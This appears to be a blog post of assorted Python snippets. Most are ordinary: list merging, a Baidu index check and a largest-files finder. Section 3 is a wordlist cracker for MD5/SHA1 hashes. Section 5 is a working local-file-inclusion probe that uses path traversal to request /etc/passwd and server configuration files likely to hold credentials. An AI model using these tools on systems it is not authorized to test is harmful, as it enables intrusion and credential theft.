1. Merging two sorted lists
#!/usr/bin/env python
# coding=utf-8
'''
Given two sorted lists, list_1 and list_2, how do we merge them efficiently while keeping
the result sorted (ascending order is assumed here)?
The idea is simple: repeatedly compare the first element of list_1 with the first element
of list_2, append the smaller one to a new list, and repeat (recursively) until every
element has been moved into the new list.
In Python even tail recursion is not particularly efficient, so to avoid blowing the stack
the usual choice is still a plain loop (loop_merge_sort).
'''
def recursion_merge_sort1(list_1, list_2):
    tmp = []
    if len(list_1) == 0:
        tmp.extend(list_2)
        return tmp
    elif len(list_2) == 0:
        tmp.extend(list_1)
        return tmp
    else:
        # move the smaller head element into tmp, then recurse on the rest
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        tmp += recursion_merge_sort1(list_1, list_2)
        return tmp
def recursion_merge_sort2(list_1, list_2, tmp=None):
    # NOTE: a mutable default argument (tmp=[]) would persist across calls,
    # so the accumulator is created fresh on each top-level call.
    if tmp is None:
        tmp = []
    if len(list_1) == 0 or len(list_2) == 0:
        tmp.extend(list_1)
        tmp.extend(list_2)
        return tmp
    else:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        return recursion_merge_sort2(list_1, list_2, tmp)
def loop_merge_sort(list_1, list_2):
    tmp = []
    while len(list_1) > 0 and len(list_2) > 0:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
    # one of the lists is exhausted; append whatever remains of the other
    tmp.extend(list_1)
    tmp.extend(list_2)
    return tmp
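A quick usage sketch (note that all three functions above consume their input lists in place via del, so pass copies if you need to keep the originals); for comparison, the standard library's heapq.merge does the same job lazily without touching the inputs:

from heapq import merge

if __name__ == '__main__':
    a, b = [1, 3, 5, 7], [2, 4, 6, 8]
    print(loop_merge_sort(a[:], b[:]))              # [1, 2, 3, 4, 5, 6, 7, 8]
    print(recursion_merge_sort1(a[:], b[:]))        # same result
    print(list(merge([1, 3, 5, 7], [2, 4, 6, 8])))  # same result, inputs untouched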
2. Checking whether Baidu has indexed a URL
#!/usr/bin/env python
#coding=utf-8
import requests
from bs4 import BeautifulSoup as bs
import re
headers = {
    'User-Agent': 'Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+GTB7.1;+.NET+CLR+2.0.50727)'
}  # a UA string to mimic a real browser; rotating several UAs can improve the success rate
def baidu_url(word):  # build the Baidu search URL; since we only check indexing, the default 10 results are enough, and the rn parameter can be used to change the result count
    '''
    get baidu search url
    '''
    return 'http://www.baidu.com/s?wd=%s' % word
def baidu_cont(url):  # fetch the Baidu search result page
    r = requests.get(url, headers=headers)
    return r.content
def serp_links(word):  # get the final URLs of the Baidu search results
    '''
    get baidu serp links with the word [SERP - Search Engine Results Page]
    '''
    b_url = baidu_url(word)
    soup = bs(baidu_cont(b_url), 'html.parser')
    b_tags = soup.find_all('h3', {'class': 't'})  # result links are identified by class="t"
    b_links = [tag.a['href'] for tag in b_tags]
    real_links = []
    for link in b_links:  # follow each link with requests to get the final URL rather than the Baidu snapshot/redirect URL
        try:
            r = requests.get(link, headers=headers, timeout=120)
        except Exception:
            real_links.append('page404')
        else:
            real_links.append(r.url)
    return real_links
def indexer(url):  # the URL counts as indexed if it appears in the list of result URLs
    indexed_links = serp_links(url)
    return url in indexed_links
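A minimal usage sketch (the URL below is hypothetical, and whether parsing succeeds depends on Baidu's current result-page markup still wrapping titles in h3 class="t"):

if __name__ == '__main__':
    test_url = 'http://www.example.com/some-article.html'  # hypothetical URL, for illustration only
    print('indexed' if indexer(test_url) else 'not indexed')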
3. Local dictionary brute-forcing of MD5/SHA1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: py_crackhash.py - crack an md5/sha1 hash by exhausting a wordlist
import sys, getopt, hashlib
if len(sys.argv) == 1:
    print 'Usage: py_crackhash.py -t hashtype{md5/sha1} -h hashcode -w wordfile'
    sys.exit()
opts, args = getopt.getopt(sys.argv[1:], "t:h:w:")
hashtype = ""
hashcode = ""
wordfile = ""
for op, value in opts:
    if op == "-t":
        hashtype = value
    elif op == "-h":
        hashcode = value
    elif op == "-w":
        wordfile = value
    else:
        sys.exit()
w = open(wordfile, 'r')
if hashtype == "md5":
    while True:
        line = w.readline()
        if line:
            y = hashlib.md5(line.rstrip()).hexdigest()
            if hashcode == y:
                print "md5(%s)=%s" % (line.rstrip(), y)
                break
        else:
            # wordlist exhausted without a match
            print 'NULL'
            break
if hashtype == "sha1":
    while True:
        line = w.readline()
        if line:
            y = hashlib.sha1(line.rstrip()).hexdigest()
            if hashcode == y:
                print "sha1(%s)=%s" % (line.rstrip(), y)
                break
        else:
            print 'NULL'
            break
w.close()
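To try the script, first generate a known hash from a word that is guaranteed to be in the wordlist; a small sketch in the same Python 2 style as the script above (wordlist.txt is a hypothetical file name):

import hashlib
with open('wordlist.txt', 'w') as f:        # hypothetical test wordlist
    f.write('admin\nletmein\npassword\n')
print(hashlib.md5('password').hexdigest())  # 5f4dcc3b5aa765d61d8327deb882cf99
# then run:
#   python py_crackhash.py -t md5 -h 5f4dcc3b5aa765d61d8327deb882cf99 -w wordlist.txt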
4. Multithreaded search for the 10 largest files under a directory
#!/usr/bin/env python
# coding=utf-8
import os, os.path
from ConfigParser import RawConfigParser as rcp
from threading import Thread, Lock
import sys
import time
MaxCount=10
def insert(tenmax, filename, filesize):
    # keep tenmax sorted by size in descending order
    i = 0
    while i < len(tenmax) and tenmax[i][1] > filesize:
        i += 1
    tenmax.insert(i, [filename, filesize])

def keepTenMax(tenmax, filename, filesize):
    # maintain at most MaxCount entries: always the biggest files seen so far
    i = len(tenmax)
    if i < MaxCount:
        insert(tenmax, filename, filesize)
    else:
        if filesize > tenmax[i-1][1]:
            insert(tenmax, filename, filesize)
            tenmax.pop()
        elif filesize == tenmax[i-1][1]:
            tenmax.append([filename, filesize])
            if len(tenmax) > MaxCount:
                del tenmax[MaxCount:]  # trim in place (rebinding the parameter would not affect the caller)
        else:
            return
class MyThread(Thread):  # one search thread per directory
    def __init__(self, root, files, tname):
        Thread.__init__(self)
        self.root = root
        self.files = files
        self.name = tname
        self.tenmax = []
    def run(self):
        global count
        for f in self.files:
            filename = self.root + os.sep + f
            filesize = os.stat(filename).st_size
            mylock.acquire()  # acquire the lock protecting the global counter
            count += 1
            mylock.release()  # release the lock
            keepTenMax(self.tenmax, filename, filesize)

def allDone(threadlist):
    for i in threadlist:
        if i.isAlive():
            return False
    return True
# main
if __name__ == "__main__":
    mylock = Lock()  # lock protecting the global file counter
    count = 0        # global count of files examined
    tenmax = []
    threadlist = []
    if len(sys.argv) == 1:
        wdir = '.'
    elif len(sys.argv) == 2:
        wdir = sys.argv[1]
    else:
        print 'Usage: findBigFiles.py [wdir]'
        sys.exit()
    tname = 1
    begin = time.time()
    for root, dirs, files in os.walk(wdir):
        if files:
            sthread = MyThread(root, files, tname)  # start one search thread per directory
            threadlist.append(sthread)
            sthread.start()
            print 'thread-' + str(tname) + '-start search dir:' + root
            tname += 1
    for t in threadlist:
        t.join()
    if allDone(threadlist):  # merge the per-thread results
        for i in threadlist:
            tenmax.extend(i.tenmax)
        if len(tenmax) < MaxCount:
            tenmax.sort(key=lambda x: x[1], reverse=True)  # fewer files than MaxCount: just sort what we have
        else:
            a = []
            for f in tenmax:
                keepTenMax(a, f[0], f[1])
            tenmax = a
    # print the list and also write it via RawConfigParser to result.txt in the current directory
    print
    print '[=========================threads count', len(threadlist), '====================]'
    print '[=========================try', count, 'files=======================]'
    print '[=========================the ', MaxCount, ' thMax files list===========]'
    print
    c = 1
    myrcp = rcp()
    myrcp.add_section('Result')
    for fname, fsize in tenmax:
        size = '%.3fMB' % (fsize / 1024.0 / 1024.0)
        print '[%d]%s-%s' % (c, fname, size)
        myrcp.set('Result', '[%d]%s' % (c, fname), size)
        c += 1
    myrcp.write(open('result.txt', 'w'))
    end = time.time()
    usetime = end - begin
    print
    print '[=============================================================]'
    print 'all time:%.3fs' % usetime
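For comparison, a rough single-threaded sketch that does the same job with the standard library's heapq.nlargest (assuming files that cannot be stat'ed should simply be skipped):

import os, heapq

def ten_biggest(wdir='.', n=10):
    sizes = []
    for root, dirs, files in os.walk(wdir):
        for f in files:
            path = os.path.join(root, f)
            try:
                sizes.append((os.stat(path).st_size, path))
            except OSError:
                continue  # skip broken symlinks / unreadable files
    return heapq.nlargest(n, sizes)  # the n largest (size, path) pairs, biggest first

for size, path in ten_biggest('.'):
    print('%s - %.3fMB' % (path, size / 1024.0 / 1024.0))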
5. Probing for local file inclusion (LFI) vulnerabilities
#!/usr/bin/env python
#-*-coding:utf-8-*-
import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("| usage:py_detect_LFI.py site url |")
print ("|this url like http://www.google.com/index.php?id= |")
print (" writed by eip_0x[Freebuf],just 4 fun |")
print ("-----------------------------------------------------")
site0 = sys.argv[1] + '/kfdsjkf7675637d.txt'  # request a file that does not exist, so the error page can serve as a baseline
req0 = urllib2.Request(site0)
conn0 = urllib2.urlopen(req0)
data0 = conn0.read()  # contents of the error page; its length is the baseline for comparison
paths1 = ['/etc/passwd'] + ['../' * i + 'etc/passwd' for i in range(1, 11)]  # /etc/passwd with up to 10 levels of ../
paths2 = [
    '/usr/local/app/apache2/conf/httpd.conf',
    '/usr/local/apache2/conf/httpd.conf',
    '/usr/local/app/apache2/conf/extra/httpd-vhosts.conf',
    '/usr/local/app/php5/lib/php.ini',
    '/etc/sysconfig/iptables',
    '/etc/httpd/conf/httpd.conf',
    '/etc/my.cnf',
    '/etc/issue',
    '/etc/redhat-release',
    '/usr/local/apache/conf/httpd.conf',
]
for path in paths1:  # first check whether '/etc/passwd' can be read through the inclusion
    site = sys.argv[1] + path
    req = urllib2.Request(site)
    try:
        conn = urllib2.urlopen(req)
        data = conn.read()
    except urllib2.URLError:
        continue
    if len(data) != len(data0):  # a page that differs from the error page suggests the file was included
        print path, " this file has been found!!!!u r lucky and have fun!!!!"
        for path2 in paths2:  # once '/etc/passwd' is readable, try config files that may hold plaintext credentials
            path2ok = path.replace("/etc/passwd", path2)  # replace(old, new[, count]); omitting count replaces every occurrence
            site2 = sys.argv[1] + path2ok
            req2 = urllib2.Request(site2)
            try:
                conn2 = urllib2.urlopen(req2)
                data2 = conn2.read()
            except urllib2.URLError:
                continue
            if len(data2) != len(data0):
                print path2, "this file has been found!!"
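Invocation sketch, following the usage banner above (the target URL is purely hypothetical; only test systems you are authorized to assess):

#   python py_detect_LFI.py "http://www.example.com/index.php?id="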
6. To be continued…
==
Much of the code here was collected while browsing blogs around the web; my thanks to the authors for sharing so generously (I have forgotten the sources of some snippets and will add the links as soon as I track them down).